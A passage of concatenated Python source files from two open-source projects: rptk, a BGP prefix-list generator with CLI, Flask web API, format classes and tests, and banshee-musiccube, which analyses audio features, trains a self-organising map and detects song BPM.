# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk command_line module."""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import logging
import sys
from rptk import RptkAPI
def logging_init():
"""Set up logger."""
log = logging.getLogger(__name__)
lh = logging.StreamHandler()
lf = logging.Formatter(
fmt="%(asctime)s %(name)s: %(levelname)s %(message)s"
)
lh.setFormatter(lf)
logging.getLogger().addHandler(lh)
return log
def pre_parse(argv):
"""Parse pre-configuration options."""
parser = argparse.ArgumentParser(add_help=False,
argument_default=argparse.SUPPRESS)
parser.add_argument('--debug', '-d', action='store_true', default=False,
help="print debug logging output")
parser.add_argument('--version', '-v', action='store_true', default=False,
help="print version and exit")
parser.add_argument('--config-file', '-f', type=str,
help="path to configuration file")
args, args_remaining = parser.parse_known_args(argv)
return parser, args, args_remaining
def parse(parser, args_remaining, api):
"""Parse configuration options."""
parser.add_argument('--query', '-Q', dest='query_class_name',
help="query class",
choices=api.query_class_loader.class_names)
parser.add_argument('--format', '-F', dest='format_class_name',
help="format class",
choices=api.format_class_loader.class_names)
parser.add_argument('--policy', '-P', dest='query_policy', type=str,
help="resolution policy",
choices=api.available_policies)
parser.add_argument('--host', '-h', dest='query_host', type=str,
help="irrd host to connect to")
parser.add_argument('--port', '-p', dest='query_port', type=int,
help="irrd service tcp port")
parser.add_argument('--name', '-n', dest='format_name', type=str,
help="prefix-list name (default: object)")
parser.add_argument('query_objects', type=str, nargs="+",
help="rpsl object name")
parser.add_argument('--help', action='help',
help="print usage information and exit")
args = parser.parse_args(args=args_remaining)
return args
def main(argv=sys.argv[1:]):
"""Execute a query."""
# setup logger
log = logging_init()
rc = 2
try:
# get config_file and debug options
log.debug(msg="got args: {}".format(argv))
parser, args, args_remaining = pre_parse(argv)
# set log level
if args.debug:
logging.getLogger().setLevel(logging.DEBUG)
log.debug(msg="debug logging started")
else:
logging.getLogger().setLevel(logging.WARNING)
# print version if requested
if args.version:
sys.stdout.write("rptk version {}\n".format(RptkAPI.version))
exit(0)
# set up api with default options
log.debug(msg="creating RptkAPI object")
api = RptkAPI(**vars(args))
log.debug(msg="RptkAPI instance ready")
# parse remaining args and update api options
log.debug(msg="parsing command-line arguments")
args = parse(parser=parser, args_remaining=args_remaining, api=api)
log.debug(msg="updating RptkAPI options")
api.update(**vars(args))
# execute query
log.debug(msg="executing query")
result = api.query(*args.query_objects)
log.debug(msg="got result")
# print formatted result
log.debug(msg="formatting output")
output = api.format(result=result)
log.debug(msg="writing output to stdout")
sys.stdout.write("{}\n".format(output))
rc = 0
except Exception as e: # pragma: no cover
log.error(msg="{}".format(e))
rc = 1
exit(rc)
if __name__ == "__main__":
main()
|
wolcomm/rptk
|
rptk/format/jsonf.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format.jsonf module."""
from __future__ import print_function
from __future__ import unicode_literals
import json
from rptk.format import BaseFormat
class JsonFormat(BaseFormat):
"""Renders result object as a JSON document."""
description = "JSON object"
content_type = "application/json"
def format(self, result=None):
"""Render output as JSON."""
self.log_method_enter(method=self.current_method)
super(self.__class__, self).format(result=result)
self.log.debug(msg="creating json output")
try:
output = json.dumps(result, indent=4)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return output
|
wolcomm/rptk
|
rptk/base.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk base module."""
from __future__ import print_function
from __future__ import unicode_literals
import inspect
import logging
class BaseObject(object):
"""BaseObject class providing generic logging functionality."""
def __init__(self):
"""Initialise object."""
self._log = logging.getLogger(self.__module__)
def __repr__(self):
"""Provide generic string representation."""
return "{}() object".format(self.cls_name)
def __enter__(self):
"""Log context manager entry."""
self.log_ready_start()
self.log_ready_done()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Log context manager exit."""
self.log_exit_start()
self.log_exit_done()
@property
def opts(self):
"""Get self.opts if it exists."""
return getattr(self, "_opts", None)
@property
def log(self):
"""Get the current logger."""
return self._log
@property
def cls_name(self):
"""Get the class name of self."""
return self.__class__.__name__
@property
def current_method(self):
"""Get the currently executing method name."""
return inspect.currentframe().f_back.f_code.co_name
def log_init(self):
"""Log entry into the __init__ method."""
self.log.debug(msg="initialising {} instance".format(self.cls_name))
def log_init_done(self):
"""Log exit from an __init__ method."""
caller = inspect.currentframe().f_back.f_back.f_code.co_name
if caller == '__init__':
self.log.debug(msg="still initialising {} instance"
.format(self.cls_name))
else:
self.log.debug(msg="{} instance initialised".format(self.cls_name))
def log_method_enter(self, method=None):
"""Log entry into a class method."""
self.log.debug(msg="entering method {}.{}"
.format(self.cls_name, method))
def log_method_exit(self, method=None):
"""Log exit from a class method."""
self.log.debug(msg="leaving method {}.{}"
.format(self.cls_name, method))
def log_ready_start(self):
"""Log start of object initialisation."""
self.log.debug(msg="preparing {} for use".format(self))
def log_ready_done(self):
"""Log end of object initialisation."""
self.log.debug(msg="{} ready for use".format(self))
def log_exit_start(self):
"""Log start of object cleanup."""
self.log.debug(msg="cleaning up {}".format(self))
def log_exit_done(self):
"""Log end of object cleanup."""
self.log.debug(msg="finished cleaning up {}".format(self))
def raise_type_error(self, arg=None, cls=None):
"""Raise a TypeError with useful logging."""
msg = "argument {} ({}) not of type {}".format(arg.__name__, arg, cls)
self.log.error(msg=msg)
raise TypeError(msg)
def raise_runtime_error(self, msg=None):
"""Raise a RuntimeError with useful logging."""
self.log.error(msg=msg)
raise RuntimeError(msg)
|
wolcomm/rptk
|
rptk/format/__init__.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format module."""
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import jinja2
from rptk.base import BaseObject
try:
basestring
except NameError:
basestring = str
try:
unicode
except NameError:
unicode = str
class BaseFormat(BaseObject):
"""Base class for the definition of output format classes."""
description = None
content_type = "text/plain"
def __init__(self, **opts):
"""Initialise new object."""
super(BaseFormat, self).__init__()
self.log_init()
self._opts = opts
self.log_init_done()
def format(self, result=None):
"""Check the result type and name."""
self.log_method_enter(method=self.current_method)
if not isinstance(result, dict):
self.raise_type_error(arg=result, cls=dict)
self.log_method_exit(method=self.current_method)
class JinjaFormat(BaseFormat):
"""Base class for Jinja2 template-based output format classes."""
template_name = None
def __init__(self, **opts):
"""Initialise new object."""
super(JinjaFormat, self).__init__(**opts)
self.log.debug("configuring jinja2 environment")
try:
self.env = jinja2.Environment(
loader=jinja2.PackageLoader('rptk')
)
self.env.trim_blocks = True
self.env.lstrip_blocks = True
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self._template = None
self.log_init_done()
def __enter__(self):
"""Load Jinja2 template."""
self.log_ready_start()
self._load_template()
self.log_ready_done()
return self
@property
def template(self):
"""Get loaded Jinja2 template object."""
return self._template
def _load_template(self):
"""Load template into Jinja2 Environment instance."""
try:
self._template = self.env.get_template(self.template_name)
except jinja2.TemplateError as e:
self.log.error(msg="{}".format(e))
raise e
self.log.debug("template loaded successfully")
def format(self, result=None):
"""Render output from template."""
self.log_method_enter(method=self.current_method)
super(JinjaFormat, self).format(result=result)
if isinstance(self.template, jinja2.Template):
try:
output = self.template.render(results=result,
now=datetime.datetime.now())
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
else:
self.raise_type_error(arg=self.template, cls=jinja2.Template)
self.log_method_exit(method=self.current_method)
return output
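# Minimal subclass sketch (illustrative): a concrete template-driven format
# only needs a description and a template name, e.g.
#   class ExampleFormat(JinjaFormat):
#       description = "Example template output"
#       template_name = "example.j2"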
|
wolcomm/rptk
|
test/helpers.py
|
<gh_stars>10-100
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Helper functions and constants for rptk test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import os
from rptk import RptkAPI
def objects():
"""Return tuples of RPSL objects to test against."""
return (("AS37271",), ("AS37271:AS-CUSTOMERS",),
("AS37271", "AS37271:AS-CUSTOMERS"))
def default_query_classes():
"""Return the dict of default query classes to test with."""
return RptkAPI.default_query_classes
def default_format_classes():
"""Return the dict of default format classes to test with."""
return RptkAPI.default_format_classes
def available_policies():
"""Return the dict of available resolution policies to test with."""
return RptkAPI.available_policies
def test_config_file():
"""Return the path to the testing config file."""
return os.path.join(os.path.dirname(__file__), "test.conf")
|
wolcomm/rptk
|
rptk/format/yamlf.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format.yamlf module."""
from __future__ import print_function
from __future__ import unicode_literals
import logging
from rptk.format import BaseFormat
import yaml
try:
from yaml import CDumper as Dumper
except ImportError as e: # pragma: no cover
logging.getLogger(__name__).warning("%s: falling back to python dumper", e)
from yaml import Dumper
class YamlFormat(BaseFormat):
"""Renders result object as a YAML document."""
description = "YAML object representation"
content_type = "application/x-yaml"
def format(self, result=None):
"""Render output as YAML."""
self.log_method_enter(method=self.current_method)
super(self.__class__, self).format(result=result)
self.log.debug(msg="creating json output")
try:
output = yaml.dump(result, Dumper=Dumper, indent=4,
explicit_start=True, explicit_end=True,
default_flow_style=False)
except Exception as e:
self.log.error(msg="{}".format(e))
raise e
self.log_method_exit(method=self.current_method)
return output
|
wolcomm/rptk
|
rptk/format/ios_null.py
|
<filename>rptk/format/ios_null.py
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk module.format.ios_null module."""
from __future__ import print_function
from __future__ import unicode_literals
from rptk.format import JinjaFormat
class IosNullFormat(JinjaFormat):
"""Renders result object a Cisco IOS prefix-list with explicit deny all."""
description = "Cisco IOS Classic / XE null prefix-list"
template_name = 'ios_null.j2'
|
wolcomm/rptk
|
rptk/web.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk web module."""
from __future__ import print_function
from __future__ import unicode_literals
import json
import logging
import flask
from rptk import RptkAPI
app = flask.Flask(__name__)
@app.route("/formats")
def get_formats():
"""Return json doc describing the available output formats."""
rptk = RptkAPI()
formats = rptk.format_class_loader.class_info
response = flask.make_response(json.dumps(formats))
response.headers['Content-Type'] = "application/json"
response.headers['Server'] = "rptk-web/{}".format(rptk.version)
return response
@app.route("/policies")
def get_policies():
"""Return json doc listing the available resolution policies."""
rptk = RptkAPI()
policies = rptk.available_policies
response = flask.make_response(json.dumps(policies))
response.headers['Content-Type'] = "application/json"
response.headers['Server'] = "rptk-web/{}".format(rptk.version)
return response
@app.route("/query")
@app.route("/<string:format>/query")
@app.route("/<string:format>/<string:obj>")
@app.route("/<string:format>/<string:obj>/<string:policy>")
def get_prefix_list(format=None, obj=None, policy=None):
"""Return prefix-lists for the requested object."""
app.logger.debug(msg="got args: {}".format(flask.request.args))
objects = flask.request.args.getlist("objects")
if obj:
objects.append(obj)
objects = set(objects)
if not format:
format = flask.request.args.get("format")
if not policy:
policy = flask.request.args.get("policy")
rptk = RptkAPI(query_policy=policy, format_class_name=format)
result = rptk.query(*objects)
output = rptk.format(result=result)
response = flask.make_response(output)
response.headers['Content-Type'] = rptk.format_class.content_type
response.headers['Server'] = "rptk-web/{}".format(rptk.version)
return response
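# Illustrative request shapes for the routes above ("json" is one of the
# default format class names exercised in the test suite; policy names are
# whatever RptkAPI.available_policies exposes):
#   GET /formats                -> JSON map of available output formats
#   GET /policies               -> JSON list of resolution policies
#   GET /json/AS37271           -> prefix lists for AS37271, rendered as JSON
#   GET /query?format=json&objects=AS37271&objects=AS37271:AS-CUSTOMERS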
def main(): # pragma: no cover
"""Run the development server."""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--debug", action="store_true", default=False,
help="enable debug mode")
args = parser.parse_args()
logger = logging.getLogger()
for h in app.logger.handlers:
logger.addHandler(h)
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
app.run(host='::', port=8080, debug=args.debug)
if __name__ == "__main__":
main()
|
wolcomm/rptk
|
test/test_formats.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk format class test cases."""
from __future__ import print_function
from __future__ import unicode_literals
import importlib
import json
import logging
import os
from helpers import default_format_classes, objects
import pytest
import yaml
try:
from yaml import CLoader as Loader
except ImportError as e:
logging.getLogger(__name__).warning("%s", e, exc_info=True)
from yaml import Loader
class TestFormatClass(object):
"""Test cases for rptk format classes."""
data_dir = os.path.join(os.path.dirname(__file__), "data")
@pytest.mark.parametrize(("format", "path"),
default_format_classes().items())
@pytest.mark.parametrize("objects", objects())
def test_format_class(self, format, path, objects, validate_schema):
"""Test rptk format class."""
mod_path, cls_name = path.rsplit(".", 1)
mod = importlib.import_module(mod_path)
cls = getattr(mod, cls_name)
result = dict()
for obj in objects:
with open(os.path.join(self.data_dir, "{}.json".format(obj))) as f:
result.update(json.load(f))
with cls() as f:
output = f.format(result=result)
if format == "json":
assert validate_schema(json.loads(output),
"get_prefix_list.schema")
elif format == "yaml":
assert validate_schema(yaml.load(output, Loader=Loader),
"get_prefix_list.schema")
else:
for obj in objects:
assert obj in output
|
wolcomm/rptk
|
test/test_api.py
|
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk API test cases."""
from __future__ import print_function
from __future__ import unicode_literals
from helpers import (available_policies, default_format_classes,
default_query_classes, objects, test_config_file)
import pytest
config_file_opts = (None, test_config_file())
@pytest.mark.usefixtures("mock_query_classes")
class TestAPI(object):
"""Test cases for rptk python API."""
@pytest.mark.parametrize("config_file", config_file_opts)
@pytest.mark.parametrize("q", default_query_classes().keys())
@pytest.mark.parametrize("f", default_format_classes().keys())
@pytest.mark.parametrize("p", available_policies().keys())
@pytest.mark.parametrize("objects", objects())
def test_api(self, config_file, q, f, p, objects):
"""Test rptk python API."""
from rptk import RptkAPI
with RptkAPI(config_file=config_file, query_class_name=q,
format_class_name=f, query_policy=p) as api:
result = api.query(*objects)
output = api.format(result=result)
assert output
|
wolcomm/rptk
|
rptk/__meta__.py
|
#!/usr/bin/env python
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved.
#
# The contents of this file are licensed under the Apache License version 2.0
# (the "License"); you may not use this file except in compliance with the
# License.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""rptk package metadata."""
from __future__ import print_function
from __future__ import unicode_literals
__version__ = "0.2.1-dev.1"
__author__ = "Workonline Communications"
__author_email__ = "<EMAIL>"
__licence__ = "Apache License 2.0"
__copyright__ = "Copyright (c) 2018 Workonline Communications (Pty) Ltd"
__url__ = "https://github.com/wolcomm/rptk"
__classifiers__ = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
]
__entry_points__ = {
'console_scripts': [
'rptk=rptk.command_line:main',
'rptk-web=rptk.web:main'
]
}
if __name__ == "__main__":
print(__version__)
|
jerleo/banshee-musiccube
|
musiccube/analyzer.py
|
# Original code by:
# <NAME>: Mapping Your Music Collection
# http://www.christianpeccei.com/musicmap/
import numpy as np
import os
import struct
import wave
from shlex import split
from subprocess import call
from uuid import uuid4
class Analyzer:
FEATURES_LENGTH = 42
SECONDS_PER_SONG = 90
SAMPLING_RATE = 10000
def valid_features(self, data):
return len(data) == self.FEATURES_LENGTH
def moments(self, x):
mean = x.mean()
std = x.var() ** 0.5
skewness = ((x - mean) ** 3).mean() / std ** 3
kurtosis = ((x - mean) ** 4).mean() / std ** 4
return [mean, std, skewness, kurtosis]
def fftfeatures(self, wavdata):
f = np.fft.fft(wavdata)
f = f[2:(f.size / 2 + 1)]
f = abs(f)
total_power = f.sum()
f = np.array_split(f, 10)
return [e.sum() / total_power for e in f]
def features(self, data):
# convert to array
x = np.array(data)
# initialize result vector
feature_vec = np.zeros(self.FEATURES_LENGTH)
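        # Layout: moments of the raw signal and of its first difference at
        # smoothing windows of 1, 10, 100 and 1000 samples (8 blocks of 4
        # values = 32), plus 10 relative FFT band powers -> 42 in total.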
        # smoothing window: 1 sample
x1 = x
d1 = x1[1:] - x1[:-1]
feature_vec[0:4] = self.moments(x1)
feature_vec[4:8] = self.moments(d1)
# smoothing window: 10 samples
x10 = x.reshape(-1, 10).mean(1)
d10 = x10[1:] - x10[:-1]
feature_vec[8:12] = self.moments(x10)
feature_vec[12:16] = self.moments(d10)
# smoothing window: 100 samples
x100 = x.reshape(-1, 100).mean(1)
d100 = x100[1:] - x100[:-1]
feature_vec[16:20] = self.moments(x100)
feature_vec[20:24] = self.moments(d100)
# smoothing window: 1000 samples
x1000 = x.reshape(-1, 1000).mean(1)
d1000 = x1000[1:] - x1000[:-1]
feature_vec[24:28] = self.moments(x1000)
feature_vec[28:32] = self.moments(d1000)
feature_vec[32:] = self.fftfeatures(data)
return feature_vec
def read_wav(self, wav_file):
song_data = wave.open(wav_file)
n = song_data.getnframes()
n = n - n % 1000
frames = song_data.readframes(n)
wav_data = struct.unpack('%dh' % n, frames)
return wav_data
def compute_features(self, mp3_file):
out_path = '/tmp/%s.wav' % uuid4()
cmd_args = 'avconv -v quiet -i "%s" -ac 1 -ar %s -t %s "%s"'
cmd_args = cmd_args % (mp3_file, self.SAMPLING_RATE,
self.SECONDS_PER_SONG, out_path)
ret_code = call(split(cmd_args))
assert(ret_code == 0)
sample_data = self.read_wav(out_path)
assert(len(sample_data) > 0)
os.remove(out_path)
return self.features(sample_data)
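# Minimal usage sketch (assumes avconv is on the PATH; 'song.mp3' is an
# illustrative file name):
if __name__ == '__main__':
    analyzer = Analyzer()
    feature_vec = analyzer.compute_features('song.mp3')
    print analyzer.valid_features(feature_vec)  # True: 42 values per song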
|
jerleo/banshee-musiccube
|
musiccube/musiccube.py
|
#!/usr/bin/env python
#
# musiccube.py
#
# Copyright (C) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import numpy as np
import os
import shelve
from analyzer import Analyzer
from banshee import Banshee
from numbacube import NumbaCube
from progress import Progress
from matplotlib import pyplot, colors
from mpl_toolkits.mplot3d import Axes3D
from pylab import figure
class MusicCube:
# path and file name of music database
DB_PATH = ".musiccube"
DB_NAME = "musiccube.dbm"
def __init__(self):
Progress("Total Time", 1).display()
# get music path from Banshee
self.banshee = Banshee()
self.music_path = self.banshee.library_source()
# get full path of music database
db_path = os.path.join(self.music_path, self.DB_PATH)
db_file = os.path.join(db_path, self.DB_NAME)
# create path to music database
if not os.path.exists(db_path):
os.makedirs(db_path)
# get and update music data
self.music_shelve = shelve.open(db_file, writeback=True)
self.update_music_data()
# transform columns to be between 0 and 1
self.scale_music_data()
# calculate number of nodes per edge
cube_edge = int(len(self.music_data) ** (1 / 3.0))
# create or load music cube
self.numba_cube = NumbaCube(
edge_length=cube_edge,
node_weights=Analyzer.FEATURES_LENGTH,
npy_path=db_path,
random_seed=1)
def __del__(self):
self.music_shelve.close()
def get_paths(self):
return self.music_shelve.keys()
def get_features(self, song):
# calculate scaled song features
song_data = np.array(self.music_shelve[song])
# normalize by column
song_data = self.scale_by_column(song_data)
return song_data
def get_position(self, song):
# return cube coordinates of song
song_features = self.get_features(song)
return self.numba_cube.get_position(song_features)
def update_music_data(self):
analyzer = Analyzer()
music_list = self.banshee.get_tracks()
# delete previously analyzed songs no longer existing in Banshee
for mp3 in self.music_shelve:
if mp3 not in music_list:
del self.music_shelve[mp3]
self.music_shelve.sync()
song_count = len(music_list)
progress = Progress("Analyzing Songs", song_count)
# calculate and save features of new songs
for mp3 in music_list:
if mp3 not in self.music_shelve:
features = analyzer.compute_features(mp3)
if analyzer.valid_features(features):
self.music_shelve[mp3] = features
self.music_shelve.sync()
progress.display()
# convert music data to array
self.music_data = np.array(self.music_shelve.values())
def update_banshee(self):
self.counter = {}
positions = {}
paths = self.get_paths()
song_count = len(paths)
progress = Progress("Updating Banshee", song_count)
for song in paths:
position = self.get_position(song)
positions[song] = position
# count song positions for plotting
if position not in self.counter:
self.counter[position] = 1
else:
self.counter[position] += 1
progress.display()
# update song positions in Banshee
self.banshee.update_tracks(positions)
def scale_music_data(self):
# scale music data column wise
mins = np.min(self.music_data, axis=0)
self.maxs = np.max(self.music_data, axis=0)
self.rng = self.maxs - mins
self.music_data = self.scale_by_column(self.music_data)
def scale_by_column(self, data, high=1.0, low=0.0):
return high - (((high - low) * (self.maxs - data)) / self.rng)
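        # Worked example: for a column with max 10 and min 2 (rng = 8), a
        # raw value of 6 maps to 1.0 - (1.0 * (10 - 6)) / 8 = 0.5.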
def train_numbacube(self):
self.numba_cube.train(self.music_data)
self.numba_cube.save()
def plot(self):
# create and show scatter plot
ax = Axes3D(figure())
# transform to array
data = np.array([(key[0], key[1], key[2], val)
for key, val in self.counter.items()])
# sort by position counter
data = data[np.argsort(data[:, 3])]
# minimum and maximum counter
min = np.min(data[:, 3])
max = np.max(data[:, 3])
# setup color mapping
colormap = pyplot.cm.ScalarMappable(
norm=colors.Normalize(vmin=min, vmax=max),
cmap=pyplot.cm.get_cmap('RdYlBu_r'))
# initialize loop
group = 0
loops = len(data)
for ix in range(loops):
# determine current group
count = data[ix][3]
# group header
if not count == group:
xs = []
ys = []
zs = []
# group body
xs.append(data[ix][0])
ys.append(data[ix][1])
zs.append(data[ix][2])
group = count
# group footer
# last item or last item of group
if (ix == loops - 1) or not (data[ix + 1][3] == group):
color = colormap.to_rgba(group)
size = 10 + group * 10
ax.scatter(xs, ys, zs, c=color, s=size)
ax.set_title("MusicCube")
pyplot.show()
if __name__ == '__main__':
music_cube = MusicCube()
music_cube.train_numbacube()
music_cube.update_banshee()
music_cube.plot()
print "Done."
|
jerleo/banshee-musiccube
|
musiccube/detector.py
|
#!/usr/bin/env python
'''
Simple program that uses the 'bpmdetect' GStreamer plugin to detect
the BPM of a song, and outputs that to console.
Requires GStreamer 1.x, PyGObject 1.x, and gst-plugins-bad
Copyright (C) 2015 <NAME>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.
'''
import os
import shelve
import sys
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst, GObject, Gio
from banshee import Banshee
class Detector:
def __message__(self, bus, msg):
if msg.type == Gst.MessageType.TAG:
tags = msg.parse_tag()
# Discard tags already set on the file
if tags.n_tags() > 1:
return
val = tags.get_value_index('beats-per-minute', 0)
try:
bpm = int(val)
            except (TypeError, ValueError):
return
if bpm > 0:
self.bpm = bpm
elif msg.type == Gst.MessageType.ERROR:
self.playbin.set_state(Gst.State.NULL)
gerror, debug_info = msg.parse_error()
if gerror:
print gerror.message.rstrip(".")
else:
print debug_info
elif msg.type == Gst.MessageType.EOS:
self.playbin.set_state(Gst.State.NULL)
self.loop.quit()
def __init__(self, song):
Gst.init(None)
audio_sink = Gst.Bin.new('audio_sink')
# bpmdetect doesn't work properly with more than one channel,
# see https://bugzilla.gnome.org/show_bug.cgi?id=751457
cf = Gst.ElementFactory.make('capsfilter')
cf.props.caps = Gst.Caps.from_string('audio/x-raw,channels=1')
fakesink = Gst.ElementFactory.make('fakesink')
fakesink.props.sync = False
fakesink.props.signal_handoffs = False
bpmdetect = Gst.ElementFactory.make('bpmdetect')
audio_sink.add(cf)
audio_sink.add(bpmdetect)
audio_sink.add(fakesink)
cf.link(bpmdetect)
bpmdetect.link(fakesink)
audio_sink.add_pad(Gst.GhostPad.new('sink', cf.get_static_pad('sink')))
self.playbin = Gst.ElementFactory.make('playbin')
self.playbin.props.audio_sink = audio_sink
bus = self.playbin.get_bus()
bus.add_signal_watch()
bus.connect('message', self.__message__)
uri = Gio.File.new_for_commandline_arg(song).get_uri()
self.playbin.props.uri = uri
self.loop = GObject.MainLoop()
def get_bpm(self):
self.playbin.set_state(Gst.State.PLAYING)
self.loop.run()
return self.bpm
if __name__ == '__main__':
if len(sys.argv) == 2:
song = sys.argv[1]
bpm_detector = Detector(song)
print bpm_detector.get_bpm()
sys.exit(0)
banshee = Banshee()
db_path = banshee.library_source()
db_path = os.path.join(db_path, '.bpm.dbm')
bpm_list = shelve.open(db_path, writeback=True)
song_list = banshee.get_tracks()
for song in song_list:
if song not in bpm_list:
bpm_detector = Detector(song)
bpm_list[song] = bpm_detector.get_bpm()
uri = Gio.File.new_for_commandline_arg(song).get_uri()
bpm = bpm_list[song]
print 'UPDATE CoreTracks SET BPM = %d WHERE Uri = "%s";' % (bpm, uri)
|
jerleo/banshee-musiccube
|
musiccube/numbacube.py
|
# Original code by:
# <NAME>: A Kohonen Map in Python (optimized by Numba)
# http://nbviewer.ipython.org/gist/alexbw/3407544
import numpy as np
import os
from numba import jit
from progress import Progress
class NumbaCube:
def __init__(self, edge_length, node_weights, npy_path=None, random_seed=None):
# Seed random generator
np.random.seed(random_seed)
self.edge_length = edge_length
self.nodes = edge_length ** 3
self.dims = node_weights
raw_grid = np.mgrid[0:edge_length, 0:edge_length, 0:edge_length]
self.indices = np.zeros((self.nodes, 3))
self.indices[:, 0] = raw_grid[0].ravel()
self.indices[:, 1] = raw_grid[1].ravel()
self.indices[:, 2] = raw_grid[2].ravel()
        self.weight_file = None
        if npy_path is not None:
            base_name = os.path.join(npy_path, "numbacube_%sx%sx%s" %
                                     (edge_length, edge_length, edge_length))
            self.weight_file = base_name + '.npy'
        # Initialize the weights, loading saved ones when available
        if self.weight_file and os.path.exists(self.weight_file):
            self.weights = np.load(self.weight_file)
            self.new = False
        else:
            self.weights = np.random.random((self.nodes, self.dims))
            self.new = True
# Allocate the weight distances
self.distances = np.zeros((self.nodes,), dtype='d')
def get_position(self, sample):
winner = get_winner(sample, self.nodes, self.dims,
self.weights, self.distances)
x = int(self.indices[winner, 0])
y = int(self.indices[winner, 1])
